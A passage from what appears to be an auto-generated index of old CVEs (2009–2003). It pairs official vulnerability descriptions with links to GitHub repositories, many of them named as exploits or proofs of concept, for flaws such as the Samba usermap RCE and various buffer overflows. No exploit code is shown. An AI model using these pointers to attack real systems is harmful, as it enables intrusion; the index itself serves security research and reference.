Cross-site request forgery (CSRF) vulnerability in user.php in Simplog 0.9.3.2, and possibly earlier, allows remote attackers to hijack the authentication of administrators and users for requests that change passwords.

- [xiaoyu-iid/Simplog-Exploit](https://github.com/xiaoyu-iid/Simplog-Exploit)

### CVE-2009-4118 (2009-12-01)

The StartServiceCtrlDispatcher function in the cvpnd service (cvpnd.exe) in Cisco VPN client for Windows before 5.0.06.0100 does not properly handle an ERROR_FAILED_SERVICE_CONTROLLER_CONNECT error, which allows local users to cause a denial of service (service crash and VPN connection loss) via a manual start of cvpnd.exe while the cvpnd service is running.

- [alt3kx/CVE-2009-4118](https://github.com/alt3kx/CVE-2009-4118)

### CVE-2009-4137 (2009-12-24)

The loadContentFromCookie function in core/Cookie.php in Piwik before 0.5 does not validate strings obtained from cookies before calling the unserialize function, which allows remote attackers to execute arbitrary code or upload arbitrary files via vectors related to the __destruct function in the Piwik_Config class; php://filter URIs; the __destruct functions in Zend Framework, as demonstrated by the Zend_Log destructor; the shutdown functions in Zend Framework, as demonstrated by the Zend_Log_Writer_Mail class; the render function in the Piwik_View class; Smarty templates; and the _eval function in Smarty.

- [Alexeyan/CVE-2009-4137](https://github.com/Alexeyan/CVE-2009-4137)

### CVE-2009-4623 (2010-01-18)

Multiple PHP remote file inclusion vulnerabilities in Advanced Comment System 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the ACS_path parameter to (1) index.php and (2) admin.php in advanced_comment_system/. NOTE: this might only be a vulnerability when the administrator has not followed installation instructions in install.php. NOTE: this might be the same as CVE-2020-35598.

- [hupe1980/CVE-2009-4623](https://github.com/hupe1980/CVE-2009-4623)
- [kernel-cyber/CVE-2009-4623](https://github.com/kernel-cyber/CVE-2009-4623)
- [MonsempesSamuel/CVE-2009-4623](https://github.com/MonsempesSamuel/CVE-2009-4623)

### CVE-2009-4660 (2010-03-03)

Stack-based buffer overflow in the AntServer Module (AntServer.exe) in BigAnt IM Server 2.50 allows remote attackers to execute arbitrary code via a long GET request to TCP port 6660.

- [war4uthor/CVE-2009-4660](https://github.com/war4uthor/CVE-2009-4660)

### CVE-2009-5147 (2017-03-29)

DL::dlopen in Ruby 1.8, 1.9.0, 1.9.2, 1.9.3, 2.0.0 before patchlevel 648, and 2.1 before 2.1.8 opens libraries with tainted names.

- [vpereira/CVE-2009-5147](https://github.com/vpereira/CVE-2009-5147)
- [zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-](https://github.com/zhangyongbo100/-Ruby-dl-handle.c-CVE-2009-5147-)

## 2008
### CVE-2008-0128 (2008-01-23)

The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.

- [ngyanch/4062-1](https://github.com/ngyanch/4062-1)

### CVE-2008-0166 (2008-05-13)

OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.

- [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
- [avarx/vulnkeys](https://github.com/avarx/vulnkeys)
- [badkeys/debianopenssl](https://github.com/badkeys/debianopenssl)
- [demining/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166](https://github.com/demining/Vulnerable-to-Debian-OpenSSL-bug-CVE-2008-0166)

### CVE-2008-0228 (2008-01-10)

Cross-site request forgery (CSRF) vulnerability in apply.cgi in the Linksys WRT54GL Wireless-G Broadband Router with firmware 4.30.9 allows remote attackers to perform actions as administrators.

- [SpiderLabs/TWSL2011-007_iOS_code_workaround](https://github.com/SpiderLabs/TWSL2011-007_iOS_code_workaround)

### CVE-2008-1611 (2008-04-01)

Stack-based buffer overflow in TFTP Server SP 1.4 for Windows allows remote attackers to cause a denial of service or execute arbitrary code via a long filename in a read or write request.

- [Axua/CVE-2008-1611](https://github.com/Axua/CVE-2008-1611)

### CVE-2008-1613 (2008-04-21)

SQL injection vulnerability in ioRD.asp in RedDot CMS 7.5 Build 7.5.0.48, and possibly other versions including 6.5 and 7.0, allows remote attackers to execute arbitrary SQL commands via the LngId parameter.

- [SECFORCE/CVE-2008-1613](https://github.com/SECFORCE/CVE-2008-1613)

### CVE-2008-2019 (2008-04-30)

Simple Machines Forum (SMF), probably 1.1.4, relies on "randomly generated static" to hinder brute-force attacks on the WAV file (aka audio) CAPTCHA, which allows remote attackers to pass the CAPTCHA test via an automated attack that considers Hamming distances. NOTE: this issue reportedly exists because of an insufficient fix for CVE-2007-3308.

- [TheRook/AudioCaptchaBypass-CVE-2008-2019](https://github.com/TheRook/AudioCaptchaBypass-CVE-2008-2019)

### CVE-2008-2938 (2008-08-13)

Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.

- [Naramsim/Offensive](https://github.com/Naramsim/Offensive)

### CVE-2008-3531 (2008-09-05)

Stack-based buffer overflow in sys/kern/vfs_mount.c in the kernel in FreeBSD 7.0 and 7.1, when vfs.usermount is enabled, allows local users to gain privileges via a crafted (1) mount or (2) nmount system call, related to copying of "user defined data" in "certain error conditions."

- [test-one9/ps4-11.50.github.io](https://github.com/test-one9/ps4-11.50.github.io)

### CVE-2008-4109 (2008-09-17)

A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch; before 4.6p1-1 on sid and lenny; and on other distributions such as SUSE uses functions that are not async-signal-safe in the signal handler for login timeouts, which allows remote attackers to cause a denial of service (connection slot exhaustion) via multiple login attempts. NOTE: this issue exists because of an incorrect fix for CVE-2006-5051.

- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387)

### CVE-2008-4250 (2008-10-23)

The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability."

- [thunderstrike9090/Conflicker_analysis_scripts](https://github.com/thunderstrike9090/Conflicker_analysis_scripts)

### CVE-2008-4609 (2008-10-20)

The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress.

- [mrclki/sockstress](https://github.com/mrclki/sockstress)

### CVE-2008-4654 (2008-10-21)

Stack-based buffer overflow in the parse_master function in the Ty demux plugin (modules/demux/ty.c) in VLC Media Player 0.9.0 through 0.9.4 allows remote attackers to execute arbitrary code via a TiVo TY media file with a header containing a crafted size value.

- [bongbongco/CVE-2008-4654](https://github.com/bongbongco/CVE-2008-4654)
- [KernelErr/VLC-CVE-2008-4654-Exploit](https://github.com/KernelErr/VLC-CVE-2008-4654-Exploit)
- [rnnsz/CVE-2008-4654](https://github.com/rnnsz/CVE-2008-4654)

### CVE-2008-4687 (2008-10-22)

manage_proj_page.php in Mantis before 1.1.4 allows remote authenticated users to execute arbitrary code via a sort parameter containing PHP sequences, which are processed by create_function within the multi_sort function in core/utility_api.php.

- [nmurilo/CVE-2008-4687-exploit](https://github.com/nmurilo/CVE-2008-4687-exploit)
- [twisted007/mantis_rce](https://github.com/twisted007/mantis_rce)

### CVE-2008-5416 (2008-12-10)

Heap-based buffer overflow in Microsoft SQL Server 2000 SP4, 8.00.2050, 8.00.2039, and earlier; SQL Server 2000 Desktop Engine (MSDE 2000) SP4; SQL Server 2005 SP2 and 9.00.1399.06; SQL Server 2000 Desktop Engine (WMSDE) on Windows Server 2003 SP1 and SP2; and Windows Internal Database (WYukon) SP2 allows remote authenticated users to cause a denial of service (access violation exception) or execute arbitrary code by calling the sp_replwritetovarbin extended stored procedure with a set of invalid parameters that trigger memory overwrite, aka "SQL Server sp_replwritetovarbin Limited Memory Overwrite Vulnerability."

- [SECFORCE/CVE-2008-5416](https://github.com/SECFORCE/CVE-2008-5416)

### CVE-2008-5862 (2009-01-06)

Directory traversal vulnerability in webcamXP 5.3.2.375 and 5.3.2.410 build 2132 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the URI.

- [K3ysTr0K3R/CVE-2008-5862-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2008-5862-EXPLOIT)

### CVE-2008-6806 (2009-05-12)

Unrestricted file upload vulnerability in includes/imageupload.php in 7Shop 1.1 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in images/artikel/.

- [threatcode/CVE-2008-6806](https://github.com/threatcode/CVE-2008-6806)

### CVE-2008-6827 (2009-06-08)

The ListView control in the Client GUI (AClient.exe) in Symantec Altiris Deployment Solution 6.x before 6.9.355 SP1 allows local users to gain SYSTEM privileges and execute arbitrary commands via a "Shatter" style attack on the "command prompt" hidden GUI button to (1) overwrite the CommandLine parameter to cmd.exe to use SYSTEM privileges and (2) modify the DLL that is loaded using the LoadLibrary API function.

- [alt3kx/CVE-2008-6827](https://github.com/alt3kx/CVE-2008-6827)

### CVE-2008-6970 (2009-08-13)

SQL injection vulnerability in dosearch.inc.php in UBB.threads 7.3.1 and earlier allows remote attackers to execute arbitrary SQL commands via the Forum[] array parameter.

- [KyomaHooin/CVE-2008-6970](https://github.com/KyomaHooin/CVE-2008-6970)

### CVE-2008-7220 (2009-09-13)

Unspecified vulnerability in Prototype JavaScript framework (prototypejs) before 1.6.0.2 allows attackers to make "cross-site ajax requests" via unknown vectors.

- [followboy1999/CVE-2008-7220](https://github.com/followboy1999/CVE-2008-7220)

## 2007
### CVE-2007-0038 (2007-03-30)

Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765; if so, then CVE-2007-0038 should be preferred.

- [Axua/CVE-2007-0038](https://github.com/Axua/CVE-2007-0038)

### CVE-2007-0843 (2007-02-23)

The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information.

- [z3APA3A/spydir](https://github.com/z3APA3A/spydir)

### CVE-2007-1567 (2007-03-21)

Stack-based buffer overflow in War FTP Daemon 1.65, and possibly earlier, allows remote attackers to cause a denial of service or execute arbitrary code via unspecified vectors, as demonstrated by warftp_165.tar by Immunity. NOTE: this might be the same issue as CVE-1999-0256, CVE-2000-0131, or CVE-2006-2171, but due to Immunity's lack of details, this cannot be certain.

- [war4uthor/CVE-2007-1567](https://github.com/war4uthor/CVE-2007-1567)

### CVE-2007-1858 (2007-05-09)

The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.

- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)

### CVE-2007-2447 (2007-05-14)

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.

- [amriunix/CVE-2007-2447](https://github.com/amriunix/CVE-2007-2447)
- [Unix13/metasploitable2](https://github.com/Unix13/metasploitable2)
- [b1fair/smb_usermap](https://github.com/b1fair/smb_usermap)
- [JoseBarrios/CVE-2007-2447](https://github.com/JoseBarrios/CVE-2007-2447)
- [3x1t1um/CVE-2007-2447](https://github.com/3x1t1um/CVE-2007-2447)
- [xlcc4096/exploit-CVE-2007-2447](https://github.com/xlcc4096/exploit-CVE-2007-2447)
- [WildfootW/CVE-2007-2447_Samba_3.0.25rc3](https://github.com/WildfootW/CVE-2007-2447_Samba_3.0.25rc3)
- [Ziemni/CVE-2007-2447-in-Python](https://github.com/Ziemni/CVE-2007-2447-in-Python)
- [0xKn/CVE-2007-2447](https://github.com/0xKn/CVE-2007-2447)
- [ozuma/CVE-2007-2447](https://github.com/ozuma/CVE-2007-2447)
- [un4gi/CVE-2007-2447](https://github.com/un4gi/CVE-2007-2447)
- [G01d3nW01f/CVE-2007-2447](https://github.com/G01d3nW01f/CVE-2007-2447)
- [cherrera0001/CVE-2007-2447](https://github.com/cherrera0001/CVE-2007-2447)
- [Alien0ne/CVE-2007-2447](https://github.com/Alien0ne/CVE-2007-2447)
- [3t4n/samba-3.0.24-CVE-2007-2447-vunerable-](https://github.com/3t4n/samba-3.0.24-CVE-2007-2447-vunerable-)
- [xbufu/CVE-2007-2447](https://github.com/xbufu/CVE-2007-2447)
- [s4msec/CVE-2007-2447](https://github.com/s4msec/CVE-2007-2447)
- [0xConstant/CVE-2007-2447](https://github.com/0xConstant/CVE-2007-2447)
- [Nosferatuvjr/Samba-Usermap-exploit](https://github.com/Nosferatuvjr/Samba-Usermap-exploit)
- [testaross4/CVE-2007-2447](https://github.com/testaross4/CVE-2007-2447)
- [mr-l0n3lly/CVE-2007-2447](https://github.com/mr-l0n3lly/CVE-2007-2447)
- [HerculesRD/PyUsernameMapScriptRCE](https://github.com/HerculesRD/PyUsernameMapScriptRCE)
- [Aviksaikat/CVE-2007-2447](https://github.com/Aviksaikat/CVE-2007-2447)
- [h3xcr4ck3r/CVE-2007-2447](https://github.com/h3xcr4ck3r/CVE-2007-2447)
- [bdunlap9/CVE-2007-2447_python](https://github.com/bdunlap9/CVE-2007-2447_python)
- [MikeRega7/CVE-2007-2447-RCE](https://github.com/MikeRega7/CVE-2007-2447-RCE)
- [0xTabun/CVE-2007-2447](https://github.com/0xTabun/CVE-2007-2447)
- [ShivamDey/Samba-CVE-2007-2447-Exploit](https://github.com/ShivamDey/Samba-CVE-2007-2447-Exploit)
- [Juantos/cve-2007-2447](https://github.com/Juantos/cve-2007-2447)
- [IamLucif3r/CVE-2007-2447-Exploit](https://github.com/IamLucif3r/CVE-2007-2447-Exploit)

### CVE-2007-3280 (2007-06-19)

The Database Link library (dblink) in PostgreSQL 8.1 implements functions via CREATE statements that map to arbitrary libraries based on the C programming language, which allows remote authenticated superusers to map and execute a function from any library, as demonstrated by using the system function in libc.so.6 to gain shell access.

- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports)

### CVE-2007-3830 (2007-07-17)

Cross-site scripting (XSS) vulnerability in alert.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 allows remote attackers to inject arbitrary web script or HTML via the reminder parameter.

- [alt3kx/CVE-2007-3830](https://github.com/alt3kx/CVE-2007-3830)

### CVE-2007-3831 (2007-07-17)

PHP remote file inclusion in main.php in ISS Proventia Network IPS GX5108 1.3 and GX5008 1.5 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.

- [alt3kx/CVE-2007-3831](https://github.com/alt3kx/CVE-2007-3831)

### CVE-2007-4559 (2007-08-28)

Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.

- [advanced-threat-research/Creosote](https://github.com/advanced-threat-research/Creosote)
- [Ooscaar/MALW](https://github.com/Ooscaar/MALW)
- [davidholiday/CVE-2007-4559](https://github.com/davidholiday/CVE-2007-4559)
- [luigigubello/trellix-tarslip-patch-bypass](https://github.com/luigigubello/trellix-tarslip-patch-bypass)
- [JamesDarf/tarpioka](https://github.com/JamesDarf/tarpioka)

### CVE-2007-4560 (2007-08-28)

clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."

- [0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution](https://github.com/0x1sac/ClamAV-Milter-Sendmail-0.91.2-Remote-Code-Execution)

### CVE-2007-4607 (2007-08-31)

Buffer overflow in the EasyMailSMTPObj ActiveX control in emsmtp.dll 6.0.1 in the Quiksoft EasyMail SMTP Object, as used in Postcast Server Pro 3.0.61 and other products, allows remote attackers to execute arbitrary code via a long argument to the SubmitToExpress method, a different vulnerability than CVE-2007-1029. NOTE: this may have been fixed in version 6.0.3.15.

- [joeyrideout/CVE-2007-4607](https://github.com/joeyrideout/CVE-2007-4607)

### CVE-2007-5036 (2007-09-24)

Multiple buffer overflows in the AirDefense Airsensor M520 with firmware 4.3.1.1 and 4.4.1.4 allow remote authenticated users to cause a denial of service (HTTPS service outage) via a crafted query string in an HTTPS request to (1) adLog.cgi, (2) post.cgi, or (3) ad.cgi, related to the "files filter."

- [alt3kx/CVE-2007-5036](https://github.com/alt3kx/CVE-2007-5036)

### CVE-2007-5962 (2008-05-22)

Memory leak in a certain Red Hat patch, applied to vsftpd 2.0.5 on Red Hat Enterprise Linux (RHEL) 5 and Fedora 6 through 8, and on Foresight Linux and rPath appliances, allows remote attackers to cause a denial of service (memory consumption) via a large number of CWD commands, as demonstrated by an attack on a daemon with the deny_file configuration option.

- [antogit-sys/CVE-2007-5962](https://github.com/antogit-sys/CVE-2007-5962)

### CVE-2007-6377 (2007-12-15)

Stack-based buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier allows remote attackers to execute arbitrary code via a long query string.

- [Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377](https://github.com/Nicoslo/Windows-exploitation-BadBlue-2.7-CVE-2007-6377)

### CVE-2007-6638 (2008-01-04)

March Networks DVR 3204 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames, passwords, device names, and IP addresses via a direct request for scripts/logfiles.tar.gz.

- [alt3kx/CVE-2007-6638](https://github.com/alt3kx/CVE-2007-6638)

### CVE-2007-6750 (2011-12-27)

The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.

- [Jeanpseven/slowl0ris](https://github.com/Jeanpseven/slowl0ris)

## 2006
### CVE-2006-0450 (2006-01-27)

phpBB 2.0.19 and earlier allows remote attackers to cause a denial of service (application crash) by (1) registering many users through profile.php or (2) using search.php to search in a certain way that confuses the database.

- [Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities](https://github.com/Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities)

### CVE-2006-0987 (2006-03-03)

The default configuration of ISC BIND before 9.4.1-P1, when configured as a caching name server, allows recursive queries and provides additional delegation information to arbitrary IP addresses, which allows remote attackers to cause a denial of service (traffic amplification) via DNS queries with spoofed source IP addresses.

- [pcastagnaro/dns_amplification_scanner](https://github.com/pcastagnaro/dns_amplification_scanner)

### CVE-2006-1236 (2006-03-15)

Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.

- [Axua/CVE-2006-1236](https://github.com/Axua/CVE-2006-1236)

### CVE-2006-2842 (2006-06-06)

PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.

- [karthi-the-hacker/CVE-2006-2842](https://github.com/karthi-the-hacker/CVE-2006-2842)

### CVE-2006-3392 (2006-07-06)

Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.

- [0xtz/CVE-2006-3392](https://github.com/0xtz/CVE-2006-3392)
- [IvanGlinkin/CVE-2006-3392](https://github.com/IvanGlinkin/CVE-2006-3392)
- [Adel-kaka-dz/CVE-2006-3392](https://github.com/Adel-kaka-dz/CVE-2006-3392)
- [gb21oc/ExploitWebmin](https://github.com/gb21oc/ExploitWebmin)
- [kernel-cyber/CVE-2006-3392](https://github.com/kernel-cyber/CVE-2006-3392)
- [g1vi/CVE-2006-3392](https://github.com/g1vi/CVE-2006-3392)
- [brosck/CVE-2006-3392](https://github.com/brosck/CVE-2006-3392)

### CVE-2006-3592 (2006-07-14)

Unspecified vulnerability in the command line interface (CLI) in Cisco Unified CallManager (CUCM) 5.0(1) through 5.0(3a) allows local users to execute arbitrary commands with elevated privileges via unspecified vectors, involving "certain CLI commands," aka bug CSCse11005.

- [adenkiewicz/CVE-2006-3592](https://github.com/adenkiewicz/CVE-2006-3592)

### CVE-2006-3747 (2006-07-28)

Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.

- [defensahacker/CVE-2006-3747](https://github.com/defensahacker/CVE-2006-3747)

### CVE-2006-4777 (2006-09-14)

Heap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.PathControl) COM object (daxctle.ocx) for Internet Explorer 6.0 SP1, on Chinese and possibly other Windows distributions, allows remote attackers to execute arbitrary code via unknown manipulations in arguments to the KeyFrame method, possibly related to an integer overflow, as demonstrated by daxctle2, and a different vulnerability than CVE-2006-4446.

- [Mario1234/js-driveby-download-CVE-2006-4777](https://github.com/Mario1234/js-driveby-download-CVE-2006-4777)

### CVE-2006-4814 (2006-12-20)

The mincore function in the Linux kernel before 2.4.33.6 does not properly lock access to user space, which has unspecified impact and attack vectors, possibly related to a deadlock.

- [tagatac/linux-CVE-2006-4814](https://github.com/tagatac/linux-CVE-2006-4814)

### CVE-2006-5051 (2006-09-27)

Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.

- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387)
- [sardine-web/CVE-2024-6387_Check](https://github.com/sardine-web/CVE-2024-6387_Check)
- [ThemeHackers/CVE-2024-6387](https://github.com/ThemeHackers/CVE-2024-6387)

### CVE-2006-6184 (2006-12-01)

Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long filename in a (1) GET or (2) PUT command.

- [shauntdergrigorian/cve-2006-6184](https://github.com/shauntdergrigorian/cve-2006-6184)
- [b03902043/CVE-2006-6184](https://github.com/b03902043/CVE-2006-6184)

### CVE-2006-20001 (2023-01-17)

A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash.

This issue affects Apache HTTP Server 2.4.54 and earlier.

- [Saksham2002/CVE-2006-20001](https://github.com/Saksham2002/CVE-2006-20001)

## 2005
### CVE-2005-0575 (2005-02-27)

Buffer overflow in Stormy Studios Knet 1.04c and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP GET request.

- [3t3rn4lv01d/CVE-2005-0575](https://github.com/3t3rn4lv01d/CVE-2005-0575)

### CVE-2005-0603 (2005-03-01)

viewtopic.php in phpBB 2.0.12 and earlier allows remote attackers to obtain sensitive information via a highlight parameter containing invalid regular expression syntax, which reveals the path in a PHP error message.

- [Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure](https://github.com/Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure)

### CVE-2005-1125 (2005-04-16)

Race condition in libsafe 2.0.16 and earlier, when running in multi-threaded applications, allows attackers to bypass libsafe protection and exploit other vulnerabilities before the _libsafe_die function call is completed.

- [tagatac/libsafe-CVE-2005-1125](https://github.com/tagatac/libsafe-CVE-2005-1125)

### CVE-2005-1794 (2005-06-01)

Microsoft Terminal Server using Remote Desktop Protocol (RDP) 5.2 stores an RSA private key in mstlsapi.dll and uses it to sign a certificate, which allows remote attackers to spoof public keys of legitimate servers and conduct man-in-the-middle attacks.

- [InitRoot/CVE-2005-1794Scanner](https://github.com/InitRoot/CVE-2005-1794Scanner)

### CVE-2005-2428 (2005-08-03)

Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.

- [schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit](https://github.com/schwankner/CVE-2005-2428-IBM-Lotus-Domino-R8-Password-Hash-Extraction-Exploit)

### CVE-2005-3299 (2005-10-23)

PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.

- [RizeKishimaro/CVE-2005-3299](https://github.com/RizeKishimaro/CVE-2005-3299)
- [Cr0w-ui/-CVE-2005-3299-](https://github.com/Cr0w-ui/-CVE-2005-3299-)

## 2004
### CVE-2004-0558 (2004-09-17)

The Internet Printing Protocol (IPP) implementation in CUPS before 1.1.21 allows remote attackers to cause a denial of service (service hang) via a certain UDP packet to the IPP port.

- [fibonascii/CVE-2004-0558](https://github.com/fibonascii/CVE-2004-0558)

### CVE-2004-1561 (2005-02-20)

Buffer overflow in Icecast 2.0.1 and earlier allows remote attackers to execute arbitrary code via an HTTP request with a large number of headers.

- [ivanitlearning/CVE-2004-1561](https://github.com/ivanitlearning/CVE-2004-1561)
- [ratiros01/CVE-2004-1561](https://github.com/ratiros01/CVE-2004-1561)
- [darrynb89/CVE-2004-1561](https://github.com/darrynb89/CVE-2004-1561)
- [thel1nus/CVE-2004-1561-Notes](https://github.com/thel1nus/CVE-2004-1561-Notes)

### CVE-2004-1769 (2005-03-10)

The "Allow cPanel users to reset their password via email" feature in cPanel 9.1.0 build 34 and earlier, including 8.x, allows remote attackers to execute arbitrary code via the user parameter to resetpass.

- [sinkaroid/shiguresh](https://github.com/sinkaroid/shiguresh)
- [Redsplit/shiguresh](https://github.com/Redsplit/shiguresh)

### CVE-2004-2167 (2005-07-10)

Multiple buffer overflows in LaTeX2rtf 1.9.15, and possibly other versions, allow remote attackers to execute arbitrary code via (1) the expandmacro function, and possibly (2) Environments and (3) TranslateCommand.

- [uzzzval/cve-2004-2167](https://github.com/uzzzval/cve-2004-2167)

### CVE-2004-2271 (2005-07-19)

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.

- [kkirsche/CVE-2004-2271](https://github.com/kkirsche/CVE-2004-2271)
- [PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow](https://github.com/PercussiveElbow/CVE-2004-2271-MiniShare-1.4.1-Buffer-Overflow)
- [war4uthor/CVE-2004-2271](https://github.com/war4uthor/CVE-2004-2271)
- [pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF](https://github.com/pwncone/CVE-2004-2271-MiniShare-1.4.1-BOF)

### CVE-2004-2449 (2005-08-20)

Roger Wilco 1.4.1.6 and earlier or Roger Wilco Base Station 0.30a and earlier allows remote attackers to cause a denial of service (application crash) via a long, malformed UDP datagram.

- [ParallelVisions/DoSTool](https://github.com/ParallelVisions/DoSTool)

### CVE-2004-2549 (2005-11-21)

Nortel Wireless LAN (WLAN) Access Point (AP) 2220, 2221, and 2225 allow remote attackers to cause a denial of service (service crash) via a TCP request with a large string, followed by 8 newline characters, to (1) the Telnet service on TCP port 23 and (2) the HTTP service on TCP port 80, possibly due to a buffer overflow.

- [alt3kx/CVE-2004-2549](https://github.com/alt3kx/CVE-2004-2549)

### CVE-2004-2687 (2007-09-23)

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.

- [h3xcr4ck3r/distccd_rce_CVE-2004-2687](https://github.com/h3xcr4ck3r/distccd_rce_CVE-2004-2687)
- [k4miyo/CVE-2004-2687](https://github.com/k4miyo/CVE-2004-2687)
- [ss0wl/CVE-2004-2687_distcc_v1](https://github.com/ss0wl/CVE-2004-2687_distcc_v1)

### CVE-2004-6768
- [yougboiz/Metasploit-CVE-2004-6768](https://github.com/yougboiz/Metasploit-CVE-2004-6768)

## 2003
### CVE-2003-0001 (2003-01-08)

